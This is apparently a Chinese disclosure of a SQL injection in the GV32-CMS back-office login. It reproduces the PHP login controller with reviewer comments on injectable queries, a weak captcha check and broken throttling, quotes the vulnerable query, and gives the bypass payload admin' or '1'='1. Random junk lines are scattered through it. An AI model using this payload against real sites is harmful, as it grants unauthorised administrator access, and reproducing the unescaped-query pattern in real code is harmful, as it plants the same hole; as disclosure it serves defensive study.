0x01 简要描述:
GV32-CMS免费开源企业建站系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业企业建站系统。软件具有执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为GV32.COM原创,有着完全的知识产权。凭借 GV32.COM的不断创新精神和认真的工作态度,GV32-CMS企业建站系统已成为国内外同类软件中最好用的企业建站系统。
0x02 详细说明:
<?php
// Refuse direct HTTP access to this file: GV32_COM is presumably defined by the
// framework bootstrap before controllers are included — confirm against the entry script.
if (!defined('GV32_COM')) exit('GV32.COM No direct script access allowed');
/**
 * Back-office login controller.
 *
 * act() renders the login form, actlogin() processes the submitted credentials,
 * and logincount() keeps a per-IP attempt counter in the `loginerror` table.
 * All collaborators come from $GLOBALS ('Templ', 'Reque', 'MySql', 'WebSe',
 * 'Helpe', '_LANG'); none of them is visible in this file, so their contracts
 * are assumed from usage only.
 *
 * Security notes for reviewers:
 *  - Every SQL statement in this class is assembled by string concatenation with
 *    request-derived values (use_name, md5(use_pwd), the client IP from getip(),
 *    $_SESSION values). Nothing is escaped here, so unless the 'Reque'/'MySql'
 *    helpers do it the statements are injectable; the fix is to pass the values as
 *    bound parameters at the DB layer rather than to interpolate them.
 *  - Passwords are matched as an unsalted md5() of the plain text, not via
 *    password_hash()/password_verify().
 *  - PHP 8 no longer treats a method named after its class as the constructor,
 *    so Login() is never run there (it is empty anyway).
 */
class Login
{
    // PHP 4 style constructor; intentionally empty.
    function Login()
    {
    }

    /**
     * Renders the login form (login_tpl.html).
     *
     * Turns on template caching with a lifetime of 86400 seconds (one day) and
     * passes the copyright string and the form action URL to the template.
     */
    function act( )
    {
        // cache the rendered page for one day (60 * 60 * 24 seconds)
        $GLOBALS['Templ'] -> caching = true;
        $GLOBALS['Templ'] -> cache_lifetime = 86400 ;
        $GLOBALS['Templ'] -> assign('copyright',COPYRIGHT); // copyright notice
        $GLOBALS['Templ'] -> assign('actUrl',EMPLOYEE_WEBURL."/login.php?load=login&act=actlogin");
        $GLOBALS['Templ'] -> display('login_tpl.html');
    }

    /**
     * Processes the submitted login form.
     *
     * Reads use_name / use_pwd / use_captcha through the POST helper, records the
     * attempt with logincount() (which may exit()), compares the captcha with
     * $_SESSION["Img"], then looks the user up by name and md5 password. On success
     * the row is stored in the session, the user's login count/IP/time are updated
     * and the per-IP error counter is reset to 0. Every outcome ends by rendering
     * suggestion_tpl.html with a message from $GLOBALS['_LANG'].
     *
     * Review notes:
     *  - The `echo` on the first statement writes the submitted user name into the
     *    response before any template output; it reads like leftover debugging and
     *    reflects unescaped input into the page.
     *  - The captcha check uses loose `!=`. If the session holds no captcha and the
     *    helper returns an empty string, "" != null is false and the check passes;
     *    prefer isset() plus a strict string comparison. $_SESSION["Img"] is also
     *    never cleared after the comparison, so one solved captcha can be reused
     *    for many attempts.
     *  - $use_nameval is concatenated unescaped into both the SELECT and the UPDATE
     *    below; the SELECT is the statement this write-up quotes as the injection
     *    point.
     */
    function actlogin( )
    {
        // NOTE(review): echoes the raw user name to the client — debug leftover.
        echo $use_nameval = $GLOBALS['Reque'] -> funpost("use_name");
        $use_pwdval = $GLOBALS['Reque'] -> funpost("use_pwd");
        $use_captchaval = $GLOBALS['Reque'] -> funpost("use_captcha");
        // Counts this attempt against the client IP before the outcome is known;
        // may render an error page and exit() when the IP is throttled.
        $this -> logincount();
        // Loose comparison against the captcha stored in the session (see notes above).
        if($use_captchaval!=$_SESSION["Img"])
        {
            $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_captchaerror']);
            $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
            $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
            $GLOBALS['Templ'] -> display('suggestion_tpl.html');
        }else{
            // User name and md5(password) are interpolated unescaped into the query.
            $sqlQuery = " SELECT use_id,use_name,use_email FROM ".SQL_PREFIX."user WHERE use_name= '".$use_nameval."' AND use_pwd = '".md5($use_pwdval)."' and use_enabled = 1 LIMIT 1 ";
            $adminInfo["emplyeeUser"] = $GLOBALS['MySql'] -> selectOne($sqlQuery);
            // Truthy use_id means a matching, enabled row was found.
            if($adminInfo["emplyeeUser"]["use_id"])
            {
                $GLOBALS['WebSe'] -> SetSession( $adminInfo );
                $nowtime = time();
                $adminip = $GLOBALS['Helpe'] -> getip();
                // Successful login: bump the login counter and record IP and time.
                // $use_nameval and $adminip are again concatenated unescaped.
                $sqlup = " UPDATE ".SQL_PREFIX."user set use_logcount = use_logcount +1 , use_loginip = '".$adminip."', use_logintime = ".$nowtime." WHERE use_name= '".$use_nameval."' and use_id = ".$adminInfo["emplyeeUser"]["use_id"]." LIMIT 1 " ;
                $GLOBALS['MySql'] -> querySql($sqlup);
                // Successful login: reset this IP's failure counter to 0.
                $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = 0 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
                $GLOBALS['MySql'] -> querySql( $updateip );
                $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_loginsusse']);
                $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
                $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL);
                $GLOBALS['Templ'] -> display('suggestion_tpl.html');
            }else{
                // No matching row: generic user/password error, back to the form.
                $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_usererror']);
                $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
                $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
                $GLOBALS['Templ'] -> display('suggestion_tpl.html');
            }
        }
    }

    /**
     * Per-IP attempt throttling backed by the `loginerror` table (logtype = 'login').
     *
     * Runs before the credentials are checked, so every attempt is counted;
     * actlogin() zeroes the counter after a successful login. Outcomes:
     *  - no row for this IP: insert one with errorcount = 1;
     *  - errorcount >= 20: increment, show bd_tomorrowerror and exit();
     *  - errorcount < 5: increment silently;
     *  - errorcount 5..19 and start_time newer than one hour: increment, show
     *    bd_counterror and exit();
     *  - errorcount 5..19 and start_time older than one hour: increment and refresh
     *    session_id.
     * When getip() returns '' or 'Unknown' the page shows bd_syserror and exits.
     *
     * Review notes:
     *  - The "older than one day, reset" branch tests start_time > $now + 86400. A
     *    timestamp recorded in the past can never be larger than now plus a day, so
     *    the reset never fires; the intended test is presumably
     *    start_time < $now - 86400. Because this method exits before the
     *    credentials are checked, the >= 20 state cannot be cleared by a successful
     *    login either, so it persists until the row is changed by hand.
     *  - The >= 20 branch updates `loginerror` without SQL_PREFIX, unlike every
     *    other statement in this class; with a non-empty prefix it targets a
     *    different table.
     *  - The IP from getip() and $_SESSION["session_id"] are interpolated into SQL
     *    unescaped. Whether getip() trusts client-controlled headers is not visible
     *    here — confirm before treating the IP as a safe value.
     */
    function logincount()
    {
        $adminip = $GLOBALS['Helpe'] -> getip();
        $now = time();
        if( $adminip!='Unknown' and $adminip!='' )
        {
            // Look up the existing counter row for this IP.
            $sqlip = " SELECT error_id , session_id , errorcount , start_time FROM ".SQL_PREFIX."loginerror WHERE ip_address = '".$adminip."' AND logtype = 'login' LIMIT 1 ";
            $useripInfo = $GLOBALS['MySql'] -> selectOne($sqlip);
            if($useripInfo["error_id"])
            {
                // Meant to reset time and count after one day, but the comparison is
                // inverted (see the method notes) and this branch is unreachable.
                if( $useripInfo["start_time"] > ( $now + 86400 ) )
                {
                    $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET `session_id` = '".$_SESSION["session_id"]."' , start_time ='".$now."' ,errorcount = '1' WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
                    $GLOBALS['MySql'] -> querySql($updateip);
                }elseif( $useripInfo["errorcount"] >= 20 )
                {
                    // NOTE(review): table name lacks SQL_PREFIX here.
                    $updateip = "UPDATE `loginerror` SET errorcount = errorcount + 1 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
                    $GLOBALS['MySql'] -> querySql( $updateip );
                    $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_tomorrowerror']);
                    $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
                    $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
                    $GLOBALS['Templ'] -> display('suggestion_tpl.html');
                    exit();
                }else{
                    // Fewer than 5 attempts: count it and let the attempt proceed.
                    if( $useripInfo["errorcount"] < 5 )
                    {
                        $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = errorcount + 1 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
                        $GLOBALS['MySql'] -> querySql($updateip);
                    }elseif( $useripInfo["start_time"] > ( $now - 3600) )
                    {
                        // 5 or more attempts within the last hour: count it and block.
                        $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = errorcount + 1 WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
                        $GLOBALS['MySql'] -> querySql($updateip);
                        $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_counterror']);
                        $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
                        $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
                        $GLOBALS['Templ'] -> display('suggestion_tpl.html');
                        exit();
                    }else{
                        // 5 or more attempts but the window is older than an hour:
                        // count it, refresh session_id, and let the attempt proceed.
                        $updateip = "UPDATE `".SQL_PREFIX."loginerror` SET errorcount = errorcount + 1 ,session_id = '".$_SESSION["session_id"]."' WHERE ip_address = '".$adminip."' AND logtype = 'login' ";
                        $GLOBALS['MySql'] -> querySql($updateip);
                    }
                }
            }else{
                // First attempt from this IP: create the counter row.
                $insertip ="INSERT INTO `".SQL_PREFIX."loginerror` (`session_id` , `errorcount` , `ip_address` , `start_time` , `logtype` ) VALUES ( '".$_SESSION["session_id"]."', '1', '$adminip', '$now', 'login')";
                $GLOBALS['MySql'] -> querySql($insertip);
            }
        }else{
            // No usable client IP: refuse the attempt with a system error.
            $GLOBALS['Templ'] -> assign('infomessage',$GLOBALS['_LANG']['bd_syserror']);
            $GLOBALS['Templ'] -> assign('URL_TIME',URL_TIME);
            $GLOBALS['Templ'] -> assign('geturl',EMPLOYEE_WEBURL."/login.php?load=login&act=act");
            $GLOBALS['Templ'] -> display('suggestion_tpl.html');
            exit();
        }
    }
}
// Instantiated on include; the dispatcher (not shown here) presumably calls
// act()/actlogin() on $Login based on the `act` query parameter — confirm.
$Login = new Login();
?>
* [" a+ d% v2 @" ?& Z( D
经典语句重现:$sqlQuery = " SELECT use_id,use_name,use_email FROM ".SQL_PREFIX."user WHERE use_name= '".$use_nameval."' AND use_pwd = '".md5($use_pwdval)."' and use_enabled = 1 LIMIT 1 ";
原本以为用注释符就完事了,后来发现被过滤了,再看 funpost 函数。
& S9 n' q4 ]& R5 i# I1 N
, K3 B' x! M7 ], y# `' C0 n. T* \
* H: V% s4 a# ~1 V7 V0 D
0x03 漏洞证明:
登录用户处填写 admin' or '1'='1
O8 `- s; V* \' W' C% `; E- x+ ?$ {' O# g6 r" @9 h7 k
2 g; M7 x+ r9 ]! c' U$ A. s: S1 b0 }& b8 k: @1 V/ ]: c& g
' C' j& k1 I( @+ |1 F+ c, z |